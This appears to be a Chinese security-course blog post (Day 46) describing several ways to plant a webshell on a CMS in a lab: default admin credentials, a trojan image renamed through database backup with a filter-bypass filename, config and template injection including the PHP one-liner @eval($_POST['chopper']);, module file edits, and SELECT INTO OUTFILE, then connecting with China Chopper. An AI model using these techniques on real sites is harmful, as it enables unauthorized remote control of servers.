网络安全-Day46-通过各方式获取whell

cms系统获取whell

1、登陆网站后台(admin/admin),如果验证码没加载出来,开启父路径就可以

网络安全-Day46-通过各方式获取whell插图


数据库备份获取whell

1、通过公司简介,上传带有一句话木马的图片

网络安全-Day46-通过各方式获取whell插图1

2、上传的图片能正常访问

网络安全-Day46-通过各方式获取whell插图2

3、数据库备份,把带有马的图片备份出啦(123.asp;.jpg防过滤)

网络安全-Day46-通过各方式获取whell插图3

4、使用菜刀连接

网络安全-Day46-通过各方式获取whell插图4

5、图形化界面

网络安全-Day46-通过各方式获取whell插图5

6、虚拟终端模式

网络安全-Day46-通过各方式获取whell插图6

修改配置文件获取whell

1、在网站名称处插入一句话密码,并保存

备注:跟在图片中插入一句话木马的原理一样,"%>做为html的闭合作用

网络安全-Day46-通过各方式获取whell插图7
网络安全-Day46-通过各方式获取whell插图8
网络安全-Day46-通过各方式获取whell插图9
修改配置文件后

2、菜刀连接,图形化界面没问题

网络安全-Day46-通过各方式获取whell插图10

3、虚拟终端模式

网络安全-Day46-通过各方式获取whell插图11


通过标签获取webshell

1、修改标签插入木马

网络安全-Day46-通过各方式获取whell插图12
网络安全-Day46-通过各方式获取whell插图13
@eval($_POST['chopper']);

2、使用工具连接

网络安全-Day46-通过各方式获取whell插图14
网络安全-Day46-通过各方式获取whell插图15

通过模块获取webshell

1、如果没有安装“模块管理器”的话,先安装

网络安全-Day46-通过各方式获取whell插图16

2、点击编辑,把一句话木马添加到wap.PHP文件中

网络安全-Day46-通过各方式获取whell插图17
网络安全-Day46-通过各方式获取whell插图18

3、或者是上传一个php文件

网络安全-Day46-通过各方式获取whell插图19

4、使用工具连接(图形化界面)

网络安全-Day46-通过各方式获取whell插图20

5、使用工具连接(虚拟终端)

网络安全-Day46-通过各方式获取whell插图21

通过数据库获取webshell

1、登陆数据库

网络安全-Day46-通过各方式获取whell插图22

2、构造语句(select '' INTO OUTFILE 'C:\php\htdocs\best111111.php';)

网络安全-Day46-通过各方式获取whell插图23

3、到虚拟机中查看文件

网络安全-Day46-通过各方式获取whell插图24

4、工具连接

网络安全-Day46-通过各方式获取whell插图25
网络安全-Day46-通过各方式获取whell插图26
本文章来自火了么博客园(carwz.cn)
火了么 » 网络安全-Day46-通过各方式获取whell

Leave a Reply